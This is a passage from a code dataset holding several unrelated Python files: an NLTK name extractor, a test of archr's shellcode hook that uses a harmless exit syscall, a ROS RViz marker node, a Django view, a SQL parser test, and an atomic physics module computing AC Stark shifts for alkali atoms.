open('OTRSiteScrape.txt','r') as text:\n \n for row in text:\n def get_human_names(row):\n tokens = nltk.tokenize.word_tokenize(row.strip())\n pos = nltk.pos_tag(tokens)\n sentt = nltk.ne_chunk(pos, binary = False)\n person_list = []\n person = []\n name = \"\"\n for subtree in sentt.subtrees(filter=lambda t: t.label() == 'PERSON'):\n for leaf in subtree.leaves():\n person.append(leaf[0])\n if len(person) > 1: #avoid grabbing lone surnames\n for part in person:\n name += part + ' '\n if name[:-1] not in person_list:\n person_list.append(name[:-1])\n name = ''\n person = []\n \n return (person_list)\n \n with open('OTRSiteNames.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, quotechar='|', quoting=csv.QUOTE_MINIMAL)\n names = get_human_names(row)\n \n for name in names: \n# last_first = HumanName(name).last + ', ' + HumanName(name).first\n writer.writerow([HumanName(name)])","sub_path":"Extras/NLTK_Parse.py","file_name":"NLTK_Parse.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357428607","text":"import tempfile\nimport shutil\nimport archr\nimport os\n\ndef setup_module():\n os.system(\"cd %s/dockers; ./build_all.sh\" % os.path.dirname(__file__))\n\ndef test_dockerfile_hook():\n with archr.targets.DockerImageTarget('archr-test:entrypoint-false').build().start() as t:\n assert t.run_command().wait() == 1\n with t.shellcode_context(asm_code=\"mov rax, 60; mov rdi, 42; syscall\") as p:\n assert p.wait() == 42\n assert 
t.run_command().wait() == 1\n\ndef test_local_hook():\n # copy out /bin/false, because we can't overwrite it obviously\n tf = tempfile.mktemp()\n shutil.copy(\"/bin/false\", tf)\n with archr.targets.LocalTarget([tf]).build().start() as t:\n assert t.run_command().wait() == 1\n with t.shellcode_context(asm_code=\"mov rax, 60; mov rdi, 42; syscall\") as p:\n assert p.wait() == 42\n assert t.run_command().wait() == 1\n os.unlink(tf)\n\nif __name__ == '__main__':\n test_dockerfile_hook()\n test_local_hook()\n","sub_path":"tests/test_shellcode_hook.py","file_name":"test_shellcode_hook.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"373403381","text":"#!/usr/bin/env python3\n\nimport rospy\n\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\nfrom laser_line_extraction.msg import LineSegmentList\nfrom geometry_msgs.msg import Point\nimport numpy as np\n\n\n\nclass RvizMarkers():\n def __init__(self):\n rospy.init_node('test_vis')\n rate = rospy.get_param('~rate', 10)\n self.update_rate = rospy.Rate(rate)\n self.line_vis_pub = rospy.Publisher('line_segment_markerarray', MarkerArray, queue_size=10)\n\n # Publishers/subscribers\n self.wall_detection_sub = rospy.Subscriber('/line_segments', LineSegmentList,\n self.wallDetectionCB, queue_size=1)\n self.wall_detection_msg = LineSegmentList()\n\n self.max_i = 0\n\n def wallDetectionCB(self, msg):\n self.wall_detection_msg = msg\n\n def visualizeLineSegments(self):\n marker_array = MarkerArray()\n\n real_idx = 0\n\n for i, line in enumerate(self.wall_detection_msg.line_segments):\n marker = Marker();\n\n # Ignore invalid points\n if np.isnan(line.start[0]):\n continue\n else:\n start_point = Point()\n start_point.x = line.start[0]\n start_point.y = line.start[1]\n end_point = Point()\n end_point.x = line.end[0]\n end_point.y = line.end[1]\n\n marker = Marker();\n marker.header.frame_id = self.wall_detection_msg.header.frame_id;\n marker.header.stamp = rospy.Time.now();\n marker.ns = \"wall_detection\";\n marker.id = real_idx;\n marker.type = Marker.LINE_STRIP;\n marker.action = Marker.ADD;\n # marker.pose.position.x = 1;\n # marker.pose.position.y = 1;\n # marker.pose.position.z = 1;\n marker.pose.orientation.x = 0.0;\n marker.pose.orientation.y = 0.0;\n marker.pose.orientation.z = 0.0;\n marker.pose.orientation.w = 1.0;\n marker.scale.x = 0.03;\n marker.color.a = 1.0; # Don't forget to set the alpha!\n marker.color.r = 0.0;\n marker.color.g = 1.0;\n marker.color.b = 0.0;\n marker.points = [start_point, end_point]\n marker_array.markers.append(marker)\n real_idx += 1\n\n if real_idx > self.max_i:\n self.max_i = real_idx\n\n # Delete old \"ghost\" markers\n for i in range(real_idx, self.max_i+3):\n marker = Marker();\n marker.header.frame_id = self.wall_detection_msg.header.frame_id;\n marker.header.stamp = rospy.Time.now();\n marker.ns = \"wall_detection\";\n marker.id = i;\n marker.action = Marker.DELETE;\n marker_array.markers.append(marker)\n\n self.max_i = real_idx\n self.line_vis_pub.publish(marker_array);\n\n def run(self):\n while not rospy.is_shutdown():\n self.vis_msg = MarkerArray()\n self.visualizeLineSegments()\n self.update_rate.sleep\n\nif __name__ == \"__main__\":\n rviz_markers = RvizMarkers()\n 
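    # (added note) run() loops until rospy shutdown, rebuilding and publishing
    # the MarkerArray each pass; nb. 'self.update_rate.sleep' inside run() lacks
    # call parentheses, so as written the loop never actually sleeps --
    # 'self.update_rate.sleep()' was presumably intended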
rviz_markers.run()\n","sub_path":"scripts/rviz_markers.py","file_name":"rviz_markers.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"99230634","text":"from django.shortcuts import render\n\ndef home(request):\n search_query = request.GET.get('query', None)\n page_context = {\n 'content_section': 'legal-resources',\n }\n return render(request, 'legal/home.html', {\n 'search_hero_heading': 'Legal resources',\n 'search_query': search_query,\n 'self': page_context\n })\n","sub_path":"fec/legal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"602130788","text":"# coding=utf-8\n# Created by Tian Yuanhao on 2016/4/5.\n# from string import upper\n\nfrom dsl.lexer import lexer\nfrom dsl.parser import parser\nfrom session.abstract_class import PysparkPro\n\ncreate_table_test = \"\"\"\ncreate table A (\n id int,\n name char(10),\n age int,\n grade int\n);\n\"\"\"\n\nselect_test = \"select * from A;\"\n\ninsert_test = \"insert into A values(5, 'c', 33, 24), (6, 'd', 33, 11);\"\n\ndelete_test = \"delete from A where id = 1;\"\n\nupdate_test = \"update A set age = 1 where id = 2;\"\n\nprint_test = \"print A;\"\n\nalert_add_test = \"alert table A add num char(20);\"\n\nalert_drop_test = \"alert table A drop num;\"\n\ndrop_table_test = \"drop table mumu;\"\n\n\ndef test_big():\n f = open(\"test.txt\", 'w')\n for i in range(10000):\n f.write(str(i) + \" \" + str(i) + \"\\n\")\n f.close()\n\n\ndef exec_sql(sql, spark):\n res = parser.parse(sql, lexer=lexer)\n from execute.main import execute_main\n execute_main(res, lexer, spark)\n\n\nif __name__ == '__main__':\n spark = PysparkPro().pysparkpro\n sql = input(\"请输入>\")\n exec_sql(sql, spark)\n# exec_sql(\"drop user tyh password 'tyh';\")\n# exec_sql(\"insert into big values(1, 1), (2 ,2);\")\n\n# exec_sql(\"print B;\")\n# exec_sql(\"select B.id, A.id from B, A where B.id > 2 and B.id > A.id;\")\n","sub_path":"pysparkpro/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"31684890","text":"\"\"\"Stefan Spence 13.11.18\r\n17.01.18 -- Run to launch UI to calculate stark shifts in Rb/Cs\r\n\r\nVersion 3: the calculations are in agreement with Arora 2007 when the hyperfine\r\nsplitting can be ignored. 
However, this version assumes that when hyperfine \r\nsplitting is relevant, it is much larger than the stark shift, so that the\r\nstark shift hamiltonian is diagonal in the hyperfine basis (no state mixing).\r\nThis assumption doesn't hold for the excited states.\r\n\r\nSimulation of atoms in an optical tweezer.\r\n1) Formulate the equations for Gaussian beam propagation.\r\n2) Look at the dipole interaction as a function of laser wavelength and \r\nspatial position\r\n3) calculate the polarisability for a given state at a given wavelength\r\n\r\n14.11.18 add in dipole potential\r\ncalculate the polarisability and compare the 2-level model to including other transitions\r\n\r\n19.11.18 extend polarisability function\r\nnow it allows several laser wavelengths and several resonant transitions \r\nadded Boltzmann's constant to global variables to convert Joules to Kelvin\r\n\r\n20.11.18\r\nmake the polarisability function work for multiple or individual wavelengths\r\ncorrect the denominator in the polarisability function from Delta^2 - Gamma^2\r\nto Delta^2 + Gamma^2\r\n\r\n13.12.18\r\nAllow the dipole.polarisability() to take wavelength as an argument\r\n\r\n18.12.18\r\nThe previous polarisability results did not agree with literature. Since the\r\nstark shift is the priority, load the polarisability from provided data.\r\nAlso must include vector and tensor polarizabilities\r\nsee F. L. Kien et al, Eur. Phys. J. D, 67, 92 (2013)\r\n\r\n21.12.18\r\nSome papers include the Stark shift for hyperfine states (Kien 2013), whereas\r\nothers use just the fine structure (see B. Arora et al, Phys. Rev. A 76, 052509 \r\n(2007))\r\nSo we will incorporate functions for both of them.\r\n\r\n02.01.19\r\nUse arc (see https://arc-alkali-rydberg-calculator.readthedocs.io/en/latest/ ) \r\nto get the data for dipole matrix elements and transition properties\r\n(note that arc gets all its Rb, Cs literature values from Safronova papers:\r\nSafronova et al, PRA 60, 6 (1999)\r\nSafronova et al, PRA 69, 022509 (2004)\r\n\r\n07.01.19\r\nAdd in functions to calculate the polarisability\r\n - when the hyperfine transitions are important (not finished - needs dipole\r\n matrix elements for hyperfine transitions): polarisability()\r\n - when hyperfine transitions can be ignored: polarisabilityJ()\r\nArora 2007 does include hyperfine splittings in a separate equations, so make\r\none acStarkShift() function where hyperfine interactions can be toggled\r\n\r\n08.01.19\r\nRemove the duplicate starkshift/polarisability functions\r\n\r\n14.01.19\r\nGive state labels (n,l,j) to the transition data\r\n\r\n15.01.19\r\nCorrect the polarisability formula (had w - w0 instead of w0 - w)\r\nNote: the arc data doesn't have linewidths for transitions\r\nSince they're usually quite small this usually doesn't make too much of a \r\ndifference [Archived this version]\r\n\r\n16.01.19\r\nRemove functions for loading polarisability data from other papers\r\nStore transition data in dat files so that importing arc is unnecessary\r\n\r\n17.01.19\r\nexplicitly state that the denominator in fractions are floats, otherwise there\r\nis integer division \r\n\r\n23.01.19 \r\nwrite a function to match the figures for polarisability from Arora 2007\r\nCorrect a factor of 1/2 in the polarisability formula to match Arora 2007\r\n\r\n29.01.19\r\nWhen the hyperfine boolean is True, use the formula from Kien 2013\r\n\r\n04.02.19\r\nuse Arora 2007 for hyperfine \r\n\r\n20.03.19\r\nAlso print the polarisability components in 
getStarkShift()\r\n\r\n27.03.19\r\nWhen looking at excited states with several possible mj values, average\r\nover the possible mj values.\r\n\r\n26.04.19\r\nAdd in a function to calculate the scattering rate at a given wavelength\r\n\r\n20.05.19\r\nFunction to get Stark shift of MF states for Rb or Cs on cooling/repump transition\r\n\r\n08.07.19\r\ninclude the vector polarisability in stark shift calculations\r\n\r\n23.11.19\r\nIntroduce Potassium 41\r\n\r\n16.03.20\r\nReplace wigner functions with ones from sympy\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport os\r\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\r\nfrom math import factorial \r\nfrom matplotlib.ticker import AutoLocator\r\nfrom sympy.physics.wigner import wigner_6j, wigner_3j, clebsch_gordan\r\nimport AtomFieldInt_Example_functions as AFF\r\n\r\n# see https://docs.sympy.org/latest/modules/physics/wigner.html for documentation\r\n# Memoized wigner functions\r\n\r\n# Generic memoization class.\r\nclass Memoize:\r\n def __init__(self, f):\r\n self.f = f\r\n self.memo = {}\r\n\r\n def __call__(self, *args):\r\n if args not in self.memo:\r\n self.memo[args] = self.f(*args)\r\n return self.memo[args]\r\n \r\n@Memoize\r\ndef wigner3j(*args):\r\n return float(wigner_3j(*args))\r\n\r\n@Memoize\r\ndef wigner6j(*args):\r\n return float(wigner_6j(*args))\r\n\r\n# Memoized Clebsch-Gordon function\r\n@Memoize\r\ndef clebschgordan(*args):\r\n return float(clebsch_gordan(*args))\r\n# global constants:\r\nc = 2.99792458e8 # speed of light in m/s\r\neps0 = 8.85419e-12 # permittivity of free space in m^-3 kg^-1 s^4 A^2\r\nh = 6.6260700e-34 # Planck's constant in m^2 kg / s\r\nhbar = 1.0545718e-34 # reduced Planck's constant in m^2 kg / s\r\na0 = 5.29177e-11 # Bohr radius in m\r\ne = 1.6021766208e-19 # magnitude of the charge on an electron in C\r\nme = 9.10938356e-31 # mass of an electron in kg\r\nkB = 1.38064852e-23 # Boltzmann's constant in m^2 kg s^-2 K^-1\r\namu = 1.6605390e-27 # atomic mass unit in kg\r\nEh = me * e**4 /(4. *np.pi *eps0 *hbar)**2 # the Hartree energy\r\nau = e**2 * a0**2 / Eh # atomic unit for polarisability\r\nbohr_magneton = 9.274014e-24\r\n# note that atomic unit au = 4 pi eps0 a0^3\r\n\r\n#####################\r\n \r\n \r\nclass atom:\r\n \"\"\"Properties of an atom: \r\n \r\n The transitions follow the order:\r\n S1/2 -> nP1/2, nP3/2\r\n P1/2 -> nS1/2. nD3/2\r\n P3/2 -> nS1/2, nD3/2, nD5/2\r\n \r\n D0: Dipole matrix elements (C m)\r\n nlj: quantum numbers of the states (n, l, j)\r\n rw: resonant wavelength (m) of transitions \r\n w0: resonant frequency (rad/s) of transitions \r\n lw: natural linewidth (rad/s) of transitions \r\n \"\"\"\r\n def __init__(self, atm = 'None'):\r\n self.atm = atm\r\n \r\n if self.atm == 'None':\r\n raise SyntaxError('Please enter the atom to be used. 
Available options are Cs133, Rb87, K41.')\r\n sys.exit(1)\r\n\r\n \r\n if atm == 'Cs133':\r\n ######### atomic properties for Cs-133: ##########\r\n # file contains columns: n, l, j, dipole matrix element, wavelength, linewidth\r\n # for the 6S1/2 state:\r\n S1_2 = np.loadtxt(r'.\\TransitionData\\CsS1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 6P1/2 state:\r\n P1_2 = np.loadtxt(r'.\\TransitionData\\CsP1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 6P3/2 state:\r\n P3_2 = np.loadtxt(r'.\\TransitionData\\CsP3_2.dat', delimiter=',', skiprows=1)\r\n self.D0S = S1_2[:,3] # dipole matrix elements from S1/2 state\r\n self.D0P1 = P1_2[:,3] # dipole matrix elements from P1/2 state\r\n self.D0P3 = P3_2[:,3] # dipole matrix elements from P3/2 state\r\n self.nljS = S1_2[:,:3] # (n,l,j) quantum numbers for transitions\r\n self.nljP1 = P1_2[:,:3]\r\n self.nljP3 = P3_2[:,:3]\r\n self.rwS = S1_2[:,4] # resonant wavelengths from S1/2 state (m)\r\n self.rwP1 = P1_2[:,4] # resonant wavelengths from P1/2 state (m)\r\n self.rwP3 = P3_2[:,4] # resonant wavelengths from P3/2 state (m)\r\n self.w0S = 2*np.pi*c / S1_2[:,4]# resonant frequency (rad/s)\r\n self.w0P1 = 2*np.pi*c / P1_2[:,4]\r\n self.w0P3 = 2*np.pi*c / P3_2[:,4]\r\n self.lwS = S1_2[:,5] # natural linewidth from S1/2 (rad/s)\r\n self.lwP1 = P1_2[:,5] # natural linewidth from P1/2 (rad/s)\r\n self.lwP3 = P3_2[:,5] # natural linewidth from P3/2 (rad/s)\r\n self.m = 133*amu\r\n self.I = 7/2\r\n self.X = self.atm\r\n # Values from steck https://steck.us/alkalidata/\r\n self.Ahfs_S = 2.2981579425*1e9 # Magnetic Dipole Constant for S1/2 state (Hz)\r\n self.Ahfs_P1 = 291.920*1e6 # Magnetic Dipole Constant for P1/2 state (Hz)\r\n self.Ahfs_P3 = 50.275*1e6 # Magnetic Dipole Constant for P3/2 state (Hz)\r\n self.Bhfs_P3 = -0.53*1e6 #Electric Quadrupole Constant for for P3/2 state (Hz)\r\n self.gS = 2.0023193043737 #Electron spin g-factor\r\n self.gL = 0.99999587 #Electron orbital g-factor\r\n self.gJS = 2.00254032 #Fine structure Lande g-factor for S1/2\r\n self.gI = -0.00039885395 #Nuclear spin g-factor\r\n self.gJP1 = 0.66590 #Fine structure Lande g-factor for P1/2\r\n self.gJP3 = 1.3340 #Fine structure Lande g-factor for P3/2\r\n \r\n \r\n if atm == 'Rb87':\r\n ######### atomic properties for Rb-87: ###########\r\n # file contains columns: n, l, j, dipole matrix element, wavelength, linewidth\r\n # for the 6S1/2 state:\r\n S1_2 = np.loadtxt(r'.\\TransitionData\\RbS1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 6P1/2 state:\r\n P1_2 = np.loadtxt(r'.\\TransitionData\\RbP1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 6P3/2 state:\r\n P3_2 = np.loadtxt(r'.\\TransitionData\\RbP3_2.dat', delimiter=',', skiprows=1)\r\n \r\n self.D0S = S1_2[:,3] # dipole matrix elements from S1/2 state\r\n self.D0P1 = P1_2[:,3] # dipole matrix elements from P1/2 state\r\n self.D0P3 = P3_2[:,3] # dipole matrix elements from P3/2 state\r\n self.nljS = S1_2[:,:3] # (n,l,j) quantum numbers for transitions\r\n self.nljP1 = P1_2[:,:3]\r\n self.nljP3 = P3_2[:,:3]\r\n self.rwS = S1_2[:,4] # resonant wavelengths from S1/2 state (m)\r\n self.rwP1 = P1_2[:,4] # resonant wavelengths from P1/2 state (m)\r\n self.rwP3 = P3_2[:,4] # resonant wavelengths from P3/2 state (m)\r\n self.w0S = 2*np.pi*c / S1_2[:,4]# resonant frequency (rad/s)\r\n self.w0P1 = 2*np.pi*c / P1_2[:,4]\r\n self.w0P3 = 2*np.pi*c / P3_2[:,4]\r\n self.lwS = S1_2[:,5] # natural linewidth from S1/2 (rad/s)\r\n self.lwP1 = P1_2[:,5] # natural linewidth from P1/2 (rad/s)\r\n self.lwP3 = P3_2[:,5] 
# natural linewidth from P3/2 (rad/s)\r\n self.m = 87*amu\r\n self.I = 3/2\r\n self.X = self.atm\r\n # Values from Steck https://steck.us/alkalidata/\r\n self.Ahfs_S = 3.4173430545215*1e9 # Magnetic Dipole Constant for S1/2 state (Hz)\r\n self.Ahfs_P1 = 408.328*1e6 # Magnetic Dipole Constant for P1/2 state (Hz)\r\n self.Ahfs_P3 = 84.7185*1e6 # Magnetic Dipole Constant for P3/2 state (Hz)\r\n self.Bhfs_P3 = 12.4965*1e6 # Electric Quadrupole Constant for P3/2 state (Hz) \r\n self.gS = 2.0023193043737 # Electron spin g-factor\r\n self.gL = 0.99999369 # Electron orbital g-factor\r\n self.gI = -0.0009951414 # Nuclear spin g-factor\r\n self.gJS = 2.00233113 # Fine structure Lande g-factor for S1/2\r\n self.gJP1 = 0.666 # Fine structure Lande g-factor for P1/2\r\n self.gJP3 = 1.3362 # Fine structure Lande g-factor for P3/2\r\n \r\n if atm == 'K41':\r\n ######### atomic properties for K-41: ###########\r\n # file contains columns: n, l, j, dipole matrix element, wavelength, linewidth\r\n # for the 4S1/2 state:\r\n S1_2 = np.loadtxt(r'.\\TransitionData\\KS1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 4P1/2 state:\r\n P1_2 = np.loadtxt(r'.\\TransitionData\\KP1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 4P3/2 state:\r\n P3_2 = np.loadtxt(r'.\\TransitionData\\KP3_2.dat', delimiter=',', skiprows=1)\r\n self.D0S = S1_2[:,3] # dipole matrix elements from S1/2 state\r\n self.D0P1 = P1_2[:,3] # dipole matrix elements from P1/2 state\r\n self.D0P3 = P3_2[:,3] # dipole matrix elements from P3/2 state\r\n self.nljS = S1_2[:,:3] # (n,l,j) quantum numbers for transitions\r\n self.nljP1 = P1_2[:,:3]\r\n self.nljP3 = P3_2[:,:3]\r\n self.rwS = S1_2[:,4] # resonant wavelengths from S1/2 state (m)\r\n self.rwP1 = P1_2[:,4] # resonant wavelengths from P1/2 state (m)\r\n self.rwP3 = P3_2[:,4] # resonant wavelengths from P3/2 state (m)\r\n self.w0S = 2*np.pi*c / S1_2[:,4] # resonant frequency (rad/s)\r\n self.w0P1 = 2*np.pi*c / P1_2[:,4]\r\n self.w0P3 = 2*np.pi*c / P3_2[:,4]\r\n self.lwS = S1_2[:,5] # natural linewidth from S1/2 (rad/s)\r\n self.lwP1 = P1_2[:,5] # natural linewidth from P1/2 (rad/s)\r\n self.lwP3 = P3_2[:,5] # natural linewidth from P3/2 (rad/s)\r\n self.m = 41*amu\r\n self.I = 3/2\r\n self.X = self.atm\r\n # Values from http://www.tobiastiecke.nl/archive/PotassiumProperties.pdf\r\n self.Ahfs_S = 127.0069352*1e6 # Magnetic Dipole Constant for S1/2 state (Hz)\r\n self.Ahfs_P1 = 15.245*1e6 # Magnetic Dipole Constant for P1/2 state (Hz)\r\n self.Ahfs_P3 = 3.363*1e6 # Magnetic Dipole Constant for P3/2 state (Hz)\r\n self.Bhfs_P3 = 3.351*1e6 # Electric Quadrupole Constant for P3/2 state (Hz)\r\n self.gS = 2.0023193043622 # Electron spin g-factor\r\n self.gL = 1-(9.10938356*1e-31)/self.m # Electron orbital g-factor\r\n self.gI = -0.00007790600 # Nuclear spin g-factor\r\n self.gJS = 2.00229421 # Fine structure Lande g-factor for S1/2\r\n self.gJP1 = 2/3 # Fine structure Lande g-factor for P1/2\r\n self.gJP3 = 4/3 # Fine structure Lande g-factor for P3/2\r\n \r\n if atm == 'Na23':\r\n ######### atomic properties for Na-23: ###########\r\n # file contains columns: n, l, j, dipole matrix element, wavelength, linewidth\r\n # for the 3S1/2 state:\r\n S1_2 = np.loadtxt(r'.\\TransitionData\\NaS1_2.dat', delimiter=',', skiprows=1)\r\n # for the 3P1/2 state:\r\n P1_2 = np.loadtxt(r'.\\TransitionData\\NaP1_2.dat', delimiter=',', skiprows=1)\r\n # for the 3P3/2 state:\r\n P3_2 = np.loadtxt(r'.\\TransitionData\\NaP3_2.dat', delimiter=',', skiprows=1)\r\n 
self.D0S = S1_2[:,3] # dipole matrix elements from S1/2 state\r\n self.D0P1 = P1_2[:,3] # dipole matrix elements from P1/2 state\r\n self.D0P3 = P3_2[:,3] # dipole matrix elements from P3/2 state\r\n self.nljS = S1_2[:,:3] # (n,l,j) quantum numbers for transitions\r\n self.nljP1 = P1_2[:,:3]\r\n self.nljP3 = P3_2[:,:3]\r\n self.rwS = S1_2[:,4] # resonant wavelengths from S1/2 state (m)\r\n self.rwP1 = P1_2[:,4] # resonant wavelengths from P1/2 state (m)\r\n self.rwP3 = P3_2[:,4] # resonant wavelengths from P3/2 state (m)\r\n self.w0S = 2*np.pi*c / S1_2[:,4] # resonant frequency (rad/s)\r\n self.w0P1 = 2*np.pi*c / P1_2[:,4]\r\n self.w0P3 = 2*np.pi*c / P3_2[:,4]\r\n self.lwS = S1_2[:,5] # natural linewidth from S1/2 (rad/s)\r\n self.lwP1 = P1_2[:,5] # natural linewidth from P1/2 (rad/s)\r\n self.lwP3 = P3_2[:,5] # natural linewidth from P3/2 (rad/s)\r\n self.m = 23*amu\r\n self.I = 3/2\r\n self.X = self.atm\r\n # Values from https://steck.us/alkalidata/sodiumnumbers.1.6.pdf\r\n self.Ahfs_S = 885.8130644*1e6 # Magnetic Dipole Constant for S1/2 state (Hz)\r\n self.Ahfs_P1 = 94.44*1e6 # Magnetic Dipole Constant for P1/2 state (Hz)\r\n self.Ahfs_P3 = 18.534*1e6 # Magnetic Dipole Constant for P3/2 state (Hz)\r\n self.Bhfs_P3 = 2.724*1e6 # Electric Quadrupole Constant for P3/2 state (Hz)\r\n self.gS = 2.0023193043737 # Electron spin g-factor\r\n self.gL = 0.9999761 # Electron orbital g-factor\r\n self.gI = -0.0008046108 # Nuclear spin g-factor\r\n self.gJS = 2.0022960 # Fine structure Lande g-factor for S1/2\r\n self.gJP1 = 0.66581 # Fine structure Lande g-factor for P1/2\r\n self.gJP3 = 1.3342 # Fine structure Lande g-factor for P3/2\r\n \r\n if self.atm not in ('Cs133', 'Rb87', 'K41', 'Na23'):\r\n raise SyntaxError('Please enter a valid atom. Available options are Cs133, Rb87, K41, Na23.')\r\n \r\n\r\n#######################\r\n\r\n\r\nclass Gauss:\r\n \"\"\"Properties and associated equations of a Gaussian beam\"\"\"\r\n def __init__(self, wavelength, power, beam_waist, polarization=(0,0,1)):\r\n self.lam = wavelength # wavelength of the laser light (in metres)\r\n self.P = power # total power of the beam (in Watts)\r\n self.w0 = beam_waist # the beam waist defines the laser mode (in metres)\r\n self.I = 2 * power / np.pi / beam_waist**2 # intensity of beam (in Watts/metre squared)\r\n self.ehat = polarization # the direction of polarization (assume linear)\r\n # note: we will mostly ignore polarization since the induced dipole \r\n # moment will be proportional to the direction of the field\r\n \r\n # assume that the beam waist is positioned at z0 = 0\r\n \r\n # from these properties we can deduce:\r\n self.zR = np.pi * beam_waist**2 / wavelength # the Rayleigh range\r\n # average intensity of sinusoidal wave gives the factor of 2\r\n self.E0 = 2 * np.sqrt(power / eps0 / c / np.pi)/beam_waist # field amplitude at the origin\r\n self.k = 2 * np.pi / wavelength # the wave vector\r\n \r\n def amplitude(self, x, y, z):\r\n \"\"\"Calculate the amplitude of the Gaussian beam at a given position.\r\n Note that this function will not work if several coordinates are 1D arrays;\r\n instead, loop over the other coordinates so that there is only ever one\r\n coordinate passed as an array.\"\"\"\r\n rhosq = x**2 + y**2 # radial coordinate squared \r\n q = z - 1.j * self.zR # complex beam parameter\r\n \r\n # Gaussian beam equation (see Optics f2f Eqn 11.7)\r\n return self.zR /1.j /q * self.E0 * np.exp(1j * self.k * z) * np.exp(\r\n 1j * self.k * rhosq / 2. 
/ q)\r\n \r\n\r\n#######################\r\n \r\n \r\nclass dipole:\r\n \"\"\"Properties and equations of the dipole interaction between atom and field\"\"\"\r\n def __init__(self, ATOM, spin_state, field_properties):\r\n \r\n self.L, self.J, self.F, self.MF = spin_state # spin quantum numbers L, J, F, M_F\r\n if self.L == 0: # S1/2 state\r\n self.Ahfs = ATOM.Ahfs_S # magnetic dipole constant\r\n self.Bhfs = 0 # electric quadrupole constant\r\n self.states = ATOM.nljS # (n,l,j) quantum numbers for transitions\r\n self.omega0 = np.array(ATOM.w0S) # resonant frequencies (rad/s)\r\n self.gam = np.array(ATOM.lwS) # spontaneous decay rate (rad/s)\r\n self.D0s = np.array(ATOM.D0S) # D0 = -e <r> for displacement r along the polarization direction\r\n self.gJ = ATOM.gJS\r\n else:\r\n if self.J == 1/2.: # P1/2 state\r\n self.Ahfs = ATOM.Ahfs_P1 # magnetic dipole constant\r\n self.Bhfs = 0 # electric quadrupole constant\r\n self.states = ATOM.nljP1 # (n,l,j) quantum numbers for transitions\r\n self.omega0 = np.array(ATOM.w0P1) # resonant frequencies (rad/s)\r\n self.gam = np.array(ATOM.lwP1) # spontaneous decay rate (rad/s)\r\n self.D0s = np.array(ATOM.D0P1) # D0 = -e <r> for displacement r along the polarization direction\r\n self.gJ = ATOM.gJP1\r\n else: # P3/2 state\r\n self.Ahfs = ATOM.Ahfs_P3 # magnetic dipole constant\r\n self.Bhfs = ATOM.Bhfs_P3 # electric quadrupole constant\r\n self.states = ATOM.nljP3 # (n,l,j) quantum numbers for transitions\r\n self.omega0 = np.array(ATOM.w0P3) # resonant frequencies (rad/s)\r\n self.gam = np.array(ATOM.lwP3) # spontaneous decay rate (rad/s)\r\n self.D0s = np.array(ATOM.D0P3) # D0 = -e <r> for displacement r along the polarization direction\r\n self.gJ = ATOM.gJP3\r\n \r\n \r\n self.m = ATOM.m # mass of the atom in kg\r\n self.gI = ATOM.gI\r\n self.gS = ATOM.gS\r\n self.gL = ATOM.gL\r\n self.I = ATOM.I # nuclear spin quantum number I\r\n self.field = Gauss(*field_properties) # combines all properties of the field\r\n self.X = ATOM.X\r\n if self.X == 'Cs133':\r\n self.Isats = np.array([24.981, 11.023]) # saturation intensities for D1, D2 transitions\r\n self.Dlws = np.array([ATOM.lwS[0], ATOM.lwS[35]]) # linewidths for D1, D2 lines\r\n self.Drws = np.array([ATOM.rwS[0], ATOM.rwS[35]]) # resonant wavelengths of D1, D2 lines\r\n elif self.X == 'Rb87':\r\n self.Isats = np.array([44.84, 25.03]) # saturation intensities for D1, D2 transitions\r\n self.Dlws = np.array([ATOM.lwS[0], ATOM.lwS[5]]) # linewidths for D1, D2 lines\r\n self.Drws = np.array([ATOM.rwS[0], ATOM.rwS[5]]) # resonant wavelengths of D1, D2 lines\r\n \r\n \r\n self.omegas = np.array(2*np.pi*c/self.field.lam) # laser frequencies (rad/s)\r\n \r\n def scatRate(self, wavel=[], I=[]):\r\n \"\"\"Return the scattering rate at a given wavelength and intensity.\r\n Default uses the dipole object's wavelength and intensity.\r\n If wavelength and intensity are supplied, they should be the same length.\"\"\"\r\n if np.size(wavel) != 0: \r\n omegas = np.array(2*np.pi*c/wavel) # laser frequencies (rad/s)\r\n else:\r\n omegas = self.omegas\r\n if np.size(I) == 0: # use intensity from field\r\n I = 2 * self.field.P / np.pi / self.field.w0**2 # beam intensity\r\n\r\n Rsc = 0\r\n for i in range(len(self.Isats)):\r\n deltas = omegas - 2 * np.pi * c / self.Drws[i] # detuning from D line\r\n Rsc += self.Dlws[i]/2. 
